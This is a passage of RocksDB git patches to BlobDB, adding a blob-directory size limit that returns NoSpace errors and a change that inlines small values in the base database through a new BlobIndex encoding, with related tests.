= "key" + ToString(key_index); + PutRandom(db, key, &rnd, &data); + } + VerifyDB(db, data); + delete db; + db = nullptr; + + // Open as blob db. Verify it can read existing data. + Open(); + VerifyDB(blob_db_, data); + for (size_t i = 0; i < kNumIteration; i++) { + auto key_index = rnd.Next() % kNumKey; + std::string key = "key" + ToString(key_index); + is_blob[key_index] = true; + PutRandom(blob_db_, key, &rnd, &data); + } + VerifyDB(blob_db_, data); + delete blob_db_; + blob_db_ = nullptr; + + // Verify plain db returns an error for keys written by blob db.
+ ASSERT_OK(DB::Open(options, dbname_, &db)); + std::string value; + for (size_t i = 0; i < kNumKey; i++) { + std::string key = "key" + ToString(i); + Status s = db->Get(ReadOptions(), key, &value); + if (data.count(key) == 0) { + ASSERT_TRUE(s.IsNotFound()); + } else if (is_blob[i]) { + ASSERT_TRUE(s.IsNotSupported()); + } else { + ASSERT_OK(s); + ASSERT_EQ(data[key], value); + } + } + delete db; +} + } // namespace blob_db } // namespace rocksdb From 05d5c575ac1d57ea4a9761fe77761f640afc6695 Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Wed, 25 Oct 2017 16:18:15 -0700 Subject: [PATCH 177/205] Return write error on reaching blob dir size limit Summary: I found that we continue accepting writes even when the blob db goes beyond the configured blob directory size limit. Now, we return an error for writes on reaching `blob_dir_size` limit and if `is_fifo` is set to false. (We cannot just drop any file when `is_fifo` is true.) Deleting the oldest file when `is_fifo` is true will be handled in a later PR. Closes https://github.com/facebook/rocksdb/pull/3060 Differential Revision: D6136156 Pulled By: sagar0 fbshipit-source-id: 2f11cb3f2eedfa94524fbfa2613dd64bfad7a23c --- utilities/blob_db/blob_db_impl.cc | 9 ++++++++- utilities/blob_db/blob_db_test.cc | 24 ++++++++++++++++++++++++ 2 files changed, 32 insertions(+), 1 deletion(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f6bc50cd206..d04b8746956 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1050,6 +1050,14 @@ uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, const Slice& value, std::string* index_entry) { + auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size(); + if (bdb_options_.blob_dir_size > 0 && + (total_blob_space_.load() + size_put) > bdb_options_.blob_dir_size) { + if (!bdb_options_.is_fifo) { + return Status::NoSpace("Blob DB reached the maximum configured size."); + } + } + Status s; uint64_t blob_offset = 0; @@ -1073,7 +1081,6 @@ Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, // increment blob count bfile->blob_count_++; - auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size(); bfile->file_size_ += size_put; last_period_write_ += size_put; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index b4907eef1fd..592ee609cff 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -653,6 +653,7 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { Options options; options.env = mock_env_.get(); BlobDBOptions bdb_options; + bdb_options.is_fifo = true; bdb_options.blob_dir_size = 100; bdb_options.blob_file_size = 100; bdb_options.disable_background_tasks = true; @@ -870,6 +871,29 @@ TEST_F(BlobDBTest, MigrateFromPlainRocksDB) { delete db; } +// Test to verify that a NoSpace IOError Status is returned on reaching +// blob_dir_size limit. +TEST_F(BlobDBTest, OutOfSpace) { + // Use mock env to stop wall clock. + Options options; + options.env = mock_env_.get(); + BlobDBOptions bdb_options; + bdb_options.blob_dir_size = 150; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + + // Each stored blob has an overhead of about 42 bytes currently. + // So a small key + a 100 byte blob should take up ~150 bytes in the db. 
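Spelled out, under the ~42-byte overhead assumption in that comment (the true constant is BlobLogRecord::kHeaderSize plus per-record key bytes, so the exact figures may differ):

    // put "key1": ~42 (record header) + 4 (key) + 100 (value) = ~146 bytes,
    //             which fits under blob_dir_size = 150
    // put "key2": ~146 + ~146 = ~292 bytes > 150 -> Status::NoSpace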
+ std::string value(100, 'v'); + ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 60)); + + // Putting another blob should fail as adding it would exceed the blob_dir_size + // limit. + Status s = blob_db_->PutWithTTL(WriteOptions(), "key2", value, 60); + ASSERT_TRUE(s.IsIOError()); + ASSERT_TRUE(s.IsNoSpace()); +} + } // namespace blob_db } // namespace rocksdb From d66bb21e180f25a3aca73abd7be16e51bcee930a Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 26 Oct 2017 12:19:43 -0700 Subject: [PATCH 178/205] Blob DB: Inline small values in base DB Summary: Adding the `min_blob_size` option to allow storing small values in base db (in LSM tree) together with the key. The goal is to improve performance for small values, while taking advantage of blob db's low write amplification for large values. Also adding expiration timestamp to blob index. It will be useful to evict stale blob indexes in base db by adding a compaction filter. I'll work on the compaction filter in future patches. See blob_index.h for the new blob index format. There are 4 cases when writing a new key: * small value w/o TTL: put in base db as normal value (i.e. ValueType::kTypeValue) * small value w/ TTL: put (type, expiration, value) to base db. * large value w/o TTL: write value to blob log and put (type, file, offset, size, compression) to base db. * large value w/ TTL: write value to blob log and put (type, expiration, file, offset, size, compression) to base db. Closes https://github.com/facebook/rocksdb/pull/3066 Differential Revision: D6142115 Pulled By: yiwu-arbug fbshipit-source-id: 9526e76e19f0839310a3f5f2a43772a4ad182cd0 --- db/db_impl.cc | 2 +- include/rocksdb/utilities/debug.h | 2 + utilities/blob_db/blob_db.h | 4 + utilities/blob_db/blob_db_impl.cc | 555 ++++++++++++------------------ utilities/blob_db/blob_db_impl.h | 26 +- utilities/blob_db/blob_db_test.cc | 135 +++++++- utilities/blob_db/blob_file.cc | 5 +- utilities/blob_db/blob_index.h | 161 +++++++++ 8 files changed, 545 insertions(+), 345 deletions(-) create mode 100644 utilities/blob_db/blob_index.h diff --git a/db/db_impl.cc b/db/db_impl.cc index 8e9754320a7..0bf425afb71 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -1588,7 +1588,7 @@ bool DBImpl::HasActiveSnapshotLaterThanSN(SequenceNumber sn) { if (snapshots_.empty()) { return false; } - return (snapshots_.newest()->GetSequenceNumber() > sn); + return (snapshots_.newest()->GetSequenceNumber() >= sn); } #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/debug.h b/include/rocksdb/utilities/debug.h index 3e325f69a09..bc5b9bf03d2 100644 --- a/include/rocksdb/utilities/debug.h +++ b/include/rocksdb/utilities/debug.h @@ -16,6 +16,8 @@ namespace rocksdb { // store multiple versions of the same user key due to snapshots, compaction not // happening yet, etc. struct KeyVersion { + KeyVersion() : user_key(""), value(""), sequence(0), type(0) {} + KeyVersion(const std::string& _user_key, const std::string& _value, SequenceNumber _sequence, int _type) : user_key(_user_key), value(_value), sequence(_sequence), type(_type) {} diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index 67463d07b30..76ab95555a0 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -52,6 +52,10 @@ struct BlobDBOptions { // and so on uint64_t ttl_range_secs = 3600; + // The smallest value to store in blob log. Values smaller than this threshold + // will be inlined in base DB together with the key.
+ uint64_t min_blob_size = 0; + // at what bytes will the blob files be synced to blob log. uint64_t bytes_per_sync = 0; diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index d04b8746956..1b915420fe5 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -33,6 +33,7 @@ #include "util/sync_point.h" #include "util/timer_queue.h" #include "utilities/blob_db/blob_db_iterator.h" +#include "utilities/blob_db/blob_index.h" namespace { int kBlockBasedTableVersionFormat = 2; @@ -49,78 +50,8 @@ void extendTimestamps(rocksdb::blob_db::tsrange_t* ts_range, uint64_t ts) { } // end namespace namespace rocksdb { - namespace blob_db { -// BlobHandle is a pointer to the blob that is stored in the LSM -class BlobHandle { - public: - BlobHandle() - : file_number_(std::numeric_limits::max()), - offset_(std::numeric_limits::max()), - size_(std::numeric_limits::max()), - compression_(kNoCompression) {} - - uint64_t filenumber() const { return file_number_; } - void set_filenumber(uint64_t fn) { file_number_ = fn; } - - // The offset of the block in the file. - uint64_t offset() const { return offset_; } - void set_offset(uint64_t _offset) { offset_ = _offset; } - - // The size of the stored block - uint64_t size() const { return size_; } - void set_size(uint64_t _size) { size_ = _size; } - - CompressionType compression() const { return compression_; } - void set_compression(CompressionType t) { compression_ = t; } - - void EncodeTo(std::string* dst) const; - - Status DecodeFrom(const Slice& input); - - void clear(); - - private: - uint64_t file_number_; - uint64_t offset_; - uint64_t size_; - CompressionType compression_; -}; - -void BlobHandle::EncodeTo(std::string* dst) const { - // Sanity check that all fields have been set - assert(offset_ != std::numeric_limits::max()); - assert(size_ != std::numeric_limits::max()); - assert(file_number_ != std::numeric_limits::max()); - - dst->reserve(30); - PutVarint64(dst, file_number_); - PutVarint64(dst, offset_); - PutVarint64(dst, size_); - dst->push_back(static_cast(compression_)); -} - -void BlobHandle::clear() { - file_number_ = std::numeric_limits::max(); - offset_ = std::numeric_limits::max(); - size_ = std::numeric_limits::max(); - compression_ = kNoCompression; -} - -Status BlobHandle::DecodeFrom(const Slice& input) { - Slice s(input); - Slice* p = &s; - if (GetVarint64(p, &file_number_) && GetVarint64(p, &offset_) && - GetVarint64(p, &size_)) { - compression_ = static_cast(p->data()[0]); - return Status::OK(); - } else { - clear(); - return Status::Corruption("bad blob handle"); - } -} - Random blob_rgen(static_cast(time(nullptr))); void BlobDBFlushBeginListener::OnFlushBegin(DB* db, const FlushJobInfo& info) { @@ -149,19 +80,20 @@ void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( if (!is_new && value_type == CompactionEventListener::CompactionListenerValueType::kValue) { - BlobHandle handle; - Status s = handle.DecodeFrom(existing_value); + BlobIndex blob_index; + Status s = blob_index.DecodeFrom(existing_value); if (s.ok()) { if (impl_->debug_level_ >= 3) - ROCKS_LOG_INFO(impl_->db_options_.info_log, - "CALLBACK COMPACTED OUT KEY: %s SN: %d " - "NEW: %d FN: %" PRIu64 " OFFSET: %" PRIu64 - " SIZE: %" PRIu64, - key.ToString().c_str(), sn, is_new, handle.filenumber(), - handle.offset(), handle.size()); - - impl_->override_vals_q_.enqueue({handle.filenumber(), key.size(), - handle.offset(), handle.size(), sn}); + ROCKS_LOG_INFO( + impl_->db_options_.info_log, + 
"CALLBACK COMPACTED OUT KEY: %s SN: %d " + "NEW: %d FN: %" PRIu64 " OFFSET: %" PRIu64 " SIZE: %" PRIu64, + key.ToString().c_str(), sn, is_new, blob_index.file_number(), + blob_index.offset(), blob_index.size()); + + impl_->override_vals_q_.enqueue({blob_index.file_number(), key.size(), + blob_index.offset(), blob_index.size(), + sn}); } } else { if (impl_->debug_level_ >= 3) @@ -178,7 +110,6 @@ BlobDBImpl::BlobDBImpl(const std::string& dbname, db_impl_(nullptr), env_(db_options.env), ttl_extractor_(blob_db_options.ttl_extractor.get()), - wo_set_(false), bdb_options_(blob_db_options), db_options_(db_options), env_options_(db_options), @@ -235,7 +166,6 @@ BlobDBOptions BlobDBImpl::GetBlobDBOptions() const { return bdb_options_; } BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) : BlobDB(db), db_impl_(static_cast_with_check(db)), - wo_set_(false), bdb_options_(blob_db_options), db_options_(db->GetOptions()), env_options_(db_->GetOptions()), @@ -610,17 +540,6 @@ std::shared_ptr BlobDBImpl::CheckOrCreateWriterLocked( return writer; } -void BlobDBImpl::UpdateWriteOptions(const WriteOptions& options) { - if (!wo_set_.load(std::memory_order_relaxed)) { - // DCLP - WriteLock wl(&mutex_); - if (!wo_set_.load(std::memory_order_acquire)) { - wo_set_.store(true, std::memory_order_release); - write_options_ = options; - } - } -} - std::shared_ptr BlobDBImpl::SelectBlobFile() { uint32_t val = blob_rgen.Next(); { @@ -736,14 +655,6 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { return bfile; } -Status BlobDBImpl::Put(const WriteOptions& options, const Slice& key, - const Slice& value) { - std::string new_value; - Slice value_slice; - uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); - return PutUntil(options, key, value_slice, expiration); -} - Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) { SequenceNumber lsn = db_impl_->GetLatestSequenceNumber(); Status s = db_->Delete(options, key); @@ -753,141 +664,94 @@ Status BlobDBImpl::Delete(const WriteOptions& options, const Slice& key) { return s; } -Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { - class BlobInserter : public WriteBatch::Handler { - private: - BlobDBImpl* impl_; - SequenceNumber sequence_; - WriteBatch updates_blob_; - std::shared_ptr last_file_; - bool has_put_; - std::string new_value_; - uint32_t default_cf_id_; - - public: - BlobInserter(BlobDBImpl* impl, SequenceNumber seq) - : impl_(impl), - sequence_(seq), - has_put_(false), - default_cf_id_(reinterpret_cast( - impl_->DefaultColumnFamily()) - ->cfd() - ->GetID()) {} - - SequenceNumber sequence() { return sequence_; } - - WriteBatch* updates_blob() { return &updates_blob_; } - - std::shared_ptr& last_file() { return last_file_; } - - bool has_put() { return has_put_; } - - virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value_slice) override { - if (column_family_id != default_cf_id_) { - return Status::NotSupported( - "Blob DB doesn't support non-default column family."); - } - Slice value_unc; - uint64_t expiration = - impl_->ExtractExpiration(key, value_slice, &value_unc, &new_value_); - - std::shared_ptr bfile = - (expiration != kNoExpiration) - ? impl_->SelectBlobFileTTL(expiration) - : ((last_file_) ? 
last_file_ : impl_->SelectBlobFile()); - if (last_file_ && last_file_ != bfile) { - return Status::NotFound("too many blob files"); - } - - if (!bfile) { - return Status::NotFound("blob file not found"); - } - - last_file_ = bfile; - has_put_ = true; - - std::string compression_output; - Slice value = impl_->GetCompressedSlice(value_unc, &compression_output); - - std::string headerbuf; - Writer::ConstructBlobHeader(&headerbuf, key, value, expiration, -1); - std::string index_entry; - Status s = impl_->AppendBlob(bfile, headerbuf, key, value, &index_entry); - if (!s.ok()) { - return s; - } - bfile->ExtendSequenceRange(sequence_); - sequence_++; - - if (expiration != kNoExpiration) { - extendTTL(&(bfile->ttl_range_), expiration); - } +class BlobDBImpl::BlobInserter : public WriteBatch::Handler { + private: + const WriteOptions& options_; + BlobDBImpl* blob_db_impl_; + uint32_t default_cf_id_; + SequenceNumber sequence_; + WriteBatch batch_; - return WriteBatchInternal::PutBlobIndex(&updates_blob_, column_family_id, - key, index_entry); + public: + BlobInserter(const WriteOptions& options, BlobDBImpl* blob_db_impl, + uint32_t default_cf_id, SequenceNumber seq) + : options_(options), + blob_db_impl_(blob_db_impl), + default_cf_id_(default_cf_id), + sequence_(seq) {} + + SequenceNumber sequence() { return sequence_; } + + WriteBatch* batch() { return &batch_; } + + virtual Status PutCF(uint32_t column_family_id, const Slice& key, + const Slice& value) override { + if (column_family_id != default_cf_id_) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); } + std::string new_value; + Slice value_slice; + uint64_t expiration = + blob_db_impl_->ExtractExpiration(key, value, &value_slice, &new_value); + Status s = blob_db_impl_->PutBlobValue(options_, key, value_slice, + expiration, sequence_, &batch_); + sequence_++; + return s; + } - virtual Status DeleteCF(uint32_t column_family_id, - const Slice& key) override { - if (column_family_id != default_cf_id_) { - return Status::NotSupported( - "Blob DB doesn't support non-default column family."); - } - WriteBatchInternal::Delete(&updates_blob_, column_family_id, key); - sequence_++; - return Status::OK(); + virtual Status DeleteCF(uint32_t column_family_id, + const Slice& key) override { + if (column_family_id != default_cf_id_) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); } + Status s = WriteBatchInternal::Delete(&batch_, column_family_id, key); + sequence_++; + return s; + } - virtual Status DeleteRange(uint32_t column_family_id, - const Slice& begin_key, const Slice& end_key) { - if (column_family_id != default_cf_id_) { - return Status::NotSupported( - "Blob DB doesn't support non-default column family."); - } - WriteBatchInternal::DeleteRange(&updates_blob_, column_family_id, - begin_key, end_key); - sequence_++; - return Status::OK(); + virtual Status DeleteRange(uint32_t column_family_id, const Slice& begin_key, + const Slice& end_key) { + if (column_family_id != default_cf_id_) { + return Status::NotSupported( + "Blob DB doesn't support non-default column family."); } + Status s = WriteBatchInternal::DeleteRange(&batch_, column_family_id, + begin_key, end_key); + sequence_++; + return s; + } - virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, - const Slice& /*key*/) override { - return Status::NotSupported("Not supported operation in blob db."); - } + virtual Status SingleDeleteCF(uint32_t /*column_family_id*/, + const Slice& /*key*/) override { + 
return Status::NotSupported("Not supported operation in blob db."); + } - virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, - const Slice& /*value*/) override { - return Status::NotSupported("Not supported operation in blob db."); - } + virtual Status MergeCF(uint32_t /*column_family_id*/, const Slice& /*key*/, + const Slice& /*value*/) override { + return Status::NotSupported("Not supported operation in blob db."); + } - virtual void LogData(const Slice& blob) override { - updates_blob_.PutLogData(blob); - } - }; + virtual void LogData(const Slice& blob) override { batch_.PutLogData(blob); } +}; +Status BlobDBImpl::Write(const WriteOptions& options, WriteBatch* updates) { MutexLock l(&write_mutex_); - SequenceNumber current_seq = db_impl_->GetLatestSequenceNumber() + 1; - BlobInserter blob_inserter(this, current_seq); + uint32_t default_cf_id = + reinterpret_cast(DefaultColumnFamily())->GetID(); + SequenceNumber current_seq = GetLatestSequenceNumber() + 1; + BlobInserter blob_inserter(options, this, default_cf_id, current_seq); Status s = updates->Iterate(&blob_inserter); if (!s.ok()) { return s; } - s = db_->Write(opts, blob_inserter.updates_blob()); + s = db_->Write(options, blob_inserter.batch()); if (!s.ok()) { return s; } - assert(current_seq == - WriteBatchInternal::Sequence(blob_inserter.updates_blob())); - assert(blob_inserter.sequence() == - current_seq + WriteBatchInternal::Count(blob_inserter.updates_blob())); - if (blob_inserter.has_put()) { - s = CloseBlobFileIfNeeded(blob_inserter.last_file()); - if (!s.ok()) { - return s; - } - } + assert(blob_inserter.sequence() == GetLatestSequenceNumber() + 1); // add deleted key to list of keys that have been deleted for book-keeping class DeleteBookkeeper : public WriteBatch::Handler { @@ -956,83 +820,106 @@ void BlobDBImpl::GetLiveFilesMetaData(std::vector* metadata) { } } +Status BlobDBImpl::Put(const WriteOptions& options, const Slice& key, + const Slice& value) { + std::string new_value; + Slice value_slice; + uint64_t expiration = ExtractExpiration(key, value, &value_slice, &new_value); + return PutUntil(options, key, value_slice, expiration); +} + Status BlobDBImpl::PutWithTTL(const WriteOptions& options, const Slice& key, const Slice& value, uint64_t ttl) { uint64_t now = EpochNow(); - assert(std::numeric_limits::max() - now > ttl); - return PutUntil(options, key, value, now + ttl); -} - -Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, - std::string* compression_output) const { - if (bdb_options_.compression == kNoCompression) { - return raw; - } - CompressionType ct = bdb_options_.compression; - CompressionOptions compression_opts; - CompressBlock(raw, compression_opts, &ct, kBlockBasedTableVersionFormat, - Slice(), compression_output); - return *compression_output; + uint64_t expiration = kNoExpiration - now > ttl ? now + ttl : kNoExpiration; + return PutUntil(options, key, value, expiration); } Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, - const Slice& value_unc, uint64_t expiration) { - TEST_SYNC_POINT("BlobDBImpl::PutUntil:Start"); + const Slice& value, uint64_t expiration) { MutexLock l(&write_mutex_); - UpdateWriteOptions(options); - - std::shared_ptr bfile = (expiration != kNoExpiration) - ? 
SelectBlobFileTTL(expiration) - : SelectBlobFile(); - - if (!bfile) return Status::NotFound("Blob file not found"); - - std::string compression_output; - Slice value = GetCompressedSlice(value_unc, &compression_output); - - std::string headerbuf; - Writer::ConstructBlobHeader(&headerbuf, key, value, expiration, -1); - - std::string index_entry; - Status s = AppendBlob(bfile, headerbuf, key, value, &index_entry); - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "Failed to append blob to FILE: %s: KEY: %s VALSZ: %d" - " status: '%s' blob_file: '%s'", - bfile->PathName().c_str(), key.ToString().c_str(), - value.size(), s.ToString().c_str(), - bfile->DumpState().c_str()); - return s; + SequenceNumber sequence = GetLatestSequenceNumber() + 1; + WriteBatch batch; + Status s = PutBlobValue(options, key, value, expiration, sequence, &batch); + if (s.ok()) { + s = db_->Write(options, &batch); } + return s; +} - WriteBatch batch; +Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, + const Slice& value, uint64_t expiration, + SequenceNumber sequence, WriteBatch* batch) { + TEST_SYNC_POINT("BlobDBImpl::PutBlobValue:Start"); + Status s; + std::string index_entry; uint32_t column_family_id = reinterpret_cast(DefaultColumnFamily())->GetID(); - s = WriteBatchInternal::PutBlobIndex(&batch, column_family_id, key, - index_entry); + if (value.size() < bdb_options_.min_blob_size) { + if (expiration == kNoExpiration) { + // Put as normal value + s = batch->Put(key, value); + } else { + // Inlined with TTL + BlobIndex::EncodeInlinedTTL(&index_entry, expiration, value); + s = WriteBatchInternal::PutBlobIndex(batch, column_family_id, key, + index_entry); + } + } else { + std::shared_ptr bfile = (expiration != kNoExpiration) + ? SelectBlobFileTTL(expiration) + : SelectBlobFile(); + if (!bfile) { + return Status::NotFound("Blob file not found"); + } - // this goes to the base db and can be expensive - if (s.ok()) { - s = db_->Write(options, &batch); - } + std::string compression_output; + Slice value_compressed = GetCompressedSlice(value, &compression_output); - if (s.ok()) { - // this is the sequence number of the write. 
- SequenceNumber sn = WriteBatchInternal::Sequence(&batch); - bfile->ExtendSequenceRange(sn); + std::string headerbuf; + Writer::ConstructBlobHeader(&headerbuf, key, value_compressed, expiration, + -1); - if (expiration != kNoExpiration) { - extendTTL(&(bfile->ttl_range_), expiration); - } + s = AppendBlob(bfile, headerbuf, key, value_compressed, expiration, + &index_entry); - s = CloseBlobFileIfNeeded(bfile); + if (s.ok()) { + bfile->ExtendSequenceRange(sequence); + if (expiration != kNoExpiration) { + extendTTL(&(bfile->ttl_range_), expiration); + } + s = CloseBlobFileIfNeeded(bfile); + if (s.ok()) { + s = WriteBatchInternal::PutBlobIndex(batch, column_family_id, key, + index_entry); + } + } else { + ROCKS_LOG_ERROR(db_options_.info_log, + "Failed to append blob to FILE: %s: KEY: %s VALSZ: %d" + " status: '%s' blob_file: '%s'", + bfile->PathName().c_str(), key.ToString().c_str(), + value.size(), s.ToString().c_str(), + bfile->DumpState().c_str()); + } } - TEST_SYNC_POINT("BlobDBImpl::PutUntil:Finish"); + TEST_SYNC_POINT("BlobDBImpl::PutBlobValue:Finish"); return s; } +Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, + std::string* compression_output) const { + if (bdb_options_.compression == kNoCompression) { + return raw; + } + CompressionType ct = bdb_options_.compression; + CompressionOptions compression_opts; + CompressBlock(raw, compression_opts, &ct, kBlockBasedTableVersionFormat, + Slice(), compression_output); + return *compression_output; +} + uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, Slice* value_slice, std::string* new_value) { @@ -1049,7 +936,8 @@ uint64_t BlobDBImpl::ExtractExpiration(const Slice& key, const Slice& value, Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, - const Slice& value, std::string* index_entry) { + const Slice& value, uint64_t expiration, + std::string* index_entry) { auto size_put = BlobLogRecord::kHeaderSize + key.size() + value.size(); if (bdb_options_.blob_dir_size > 0 && (total_blob_space_.load() + size_put) > bdb_options_.blob_dir_size) { @@ -1086,18 +974,14 @@ Status BlobDBImpl::AppendBlob(const std::shared_ptr& bfile, last_period_write_ += size_put; total_blob_space_ += size_put; - BlobHandle handle; - handle.set_filenumber(bfile->BlobFileNumber()); - handle.set_size(value.size()); - handle.set_offset(blob_offset); - handle.set_compression(bdb_options_.compression); - handle.EncodeTo(index_entry); - - if (debug_level_ >= 3) - ROCKS_LOG_INFO(db_options_.info_log, - ">Adding KEY FILE: %s: BC: %d OFFSET: %d SZ: %d", - bfile->PathName().c_str(), bfile->blob_count_.load(), - blob_offset, value.size()); + if (expiration == kNoExpiration) { + BlobIndex::EncodeBlob(index_entry, bfile->BlobFileNumber(), blob_offset, + value.size(), bdb_options_.compression); + } else { + BlobIndex::EncodeBlobTTL(index_entry, expiration, bfile->BlobFileNumber(), + blob_offset, value.size(), + bdb_options_.compression); + } return s; } @@ -1138,29 +1022,45 @@ bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, PinnableSlice* value) { assert(value != nullptr); - BlobHandle handle; - Status s = handle.DecodeFrom(index_entry); - if (!s.ok()) return s; + BlobIndex blob_index; + Status s = blob_index.DecodeFrom(index_entry); + if (!s.ok()) { + return s; + } + if (blob_index.HasTTL() && blob_index.expiration() <= EpochNow()) { + return Status::NotFound("Key expired"); + } + if 
(blob_index.IsInlined()) { + // TODO(yiwu): If index_entry is a PinnableSlice, we can also pin the same + // memory buffer to avoid extra copy. + value->PinSelf(blob_index.value()); + return Status::OK(); + } + if (blob_index.size() == 0) { + value->PinSelf(""); + return Status::OK(); + } // offset has to have certain min, as we will read CRC // later from the Blob Header, which needs to be also a // valid offset. - if (handle.offset() < + if (blob_index.offset() < (BlobLogHeader::kHeaderSize + BlobLogRecord::kHeaderSize + key.size())) { if (debug_level_ >= 2) { - ROCKS_LOG_ERROR( - db_options_.info_log, - "Invalid blob handle file_number: %" PRIu64 " blob_offset: %" PRIu64 - " blob_size: %" PRIu64 " key: %s", - handle.filenumber(), handle.offset(), handle.size(), key.data()); + ROCKS_LOG_ERROR(db_options_.info_log, + "Invalid blob index file_number: %" PRIu64 + " blob_offset: %" PRIu64 " blob_size: %" PRIu64 + " key: %s", + blob_index.file_number(), blob_index.offset(), + blob_index.size(), key.data()); } - return Status::NotFound("Blob Not Found, although found in LSM"); + return Status::NotFound("Invalid blob offset"); } std::shared_ptr bfile; { ReadLock rl(&mutex_); - auto hitr = blob_files_.find(handle.filenumber()); + auto hitr = blob_files_.find(blob_index.file_number()); // file was deleted if (hitr == blob_files_.end()) { @@ -1170,7 +1070,7 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, bfile = hitr->second; } - if (handle.size() == 0 && value != nullptr) { + if (blob_index.size() == 0 && value != nullptr) { value->PinSelf(""); return Status::OK(); } @@ -1186,19 +1086,19 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, } // allocate the buffer. This is safe in C++11 - valueptr->resize(handle.size()); + valueptr->resize(blob_index.size()); char* buffer = &(*valueptr)[0]; Slice blob_value; - s = reader->Read(handle.offset(), handle.size(), &blob_value, buffer); - if (!s.ok() || blob_value.size() != handle.size()) { + s = reader->Read(blob_index.offset(), blob_index.size(), &blob_value, buffer); + if (!s.ok() || blob_value.size() != blob_index.size()) { if (debug_level_ >= 2) { ROCKS_LOG_ERROR(db_options_.info_log, "Failed to read blob from file: %s blob_offset: %" PRIu64 " blob_size: %" PRIu64 " read: %d key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - static_cast(blob_value.size()), key.data(), - s.ToString().c_str()); + bfile->PathName().c_str(), blob_index.offset(), + blob_index.size(), static_cast(blob_value.size()), + key.data(), s.ToString().c_str()); } return Status::NotFound("Blob Not Found as couldnt retrieve Blob"); } @@ -1208,15 +1108,15 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, std::string crc_str; crc_str.resize(sizeof(uint32_t)); char* crc_buffer = &(crc_str[0]); - s = reader->Read(handle.offset() - (key.size() + sizeof(uint32_t)), + s = reader->Read(blob_index.offset() - (key.size() + sizeof(uint32_t)), sizeof(uint32_t), &crc_slice, crc_buffer); if (!s.ok() || !GetFixed32(&crc_slice, &crc_exp)) { if (debug_level_ >= 2) { ROCKS_LOG_ERROR(db_options_.info_log, "Failed to fetch blob crc file: %s blob_offset: %" PRIu64 " blob_size: %" PRIu64 " key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - key.data(), s.ToString().c_str()); + bfile->PathName().c_str(), blob_index.offset(), + blob_index.size(), key.data(), s.ToString().c_str()); } return Status::NotFound("Blob Not Found as couldnt retrieve CRC"); } @@ 
-1228,8 +1128,8 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, ROCKS_LOG_ERROR(db_options_.info_log, "Blob crc mismatch file: %s blob_offset: %" PRIu64 " blob_size: %" PRIu64 " key: %s status: '%s'", - bfile->PathName().c_str(), handle.offset(), handle.size(), - key.data(), s.ToString().c_str()); + bfile->PathName().c_str(), blob_index.offset(), + blob_index.size(), key.data(), s.ToString().c_str()); } return Status::Corruption("Corruption. Blob CRC mismatch"); } @@ -1357,8 +1257,9 @@ bool BlobDBImpl::FileDeleteOk_SnapshotCheckLocked( SequenceNumber esn = bfile->GetSNRange().first; - // this is not correct. - // you want to check that there are no snapshots in the + // TODO(yiwu): Here we should check instead whether there is an active snapshot + // that lies between the first sequence in the file and the last sequence by + // the time the file finishes being garbage collected. bool notok = db_impl_->HasActiveSnapshotLaterThanSN(esn); if (notok) { ROCKS_LOG_INFO(db_options_.info_log, @@ -1398,16 +1299,16 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, } bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) { - BlobHandle handle; - Status s = handle.DecodeFrom(index_entry); + BlobIndex blob_index; + Status s = blob_index.DecodeFrom(index_entry); if (!s.ok()) { 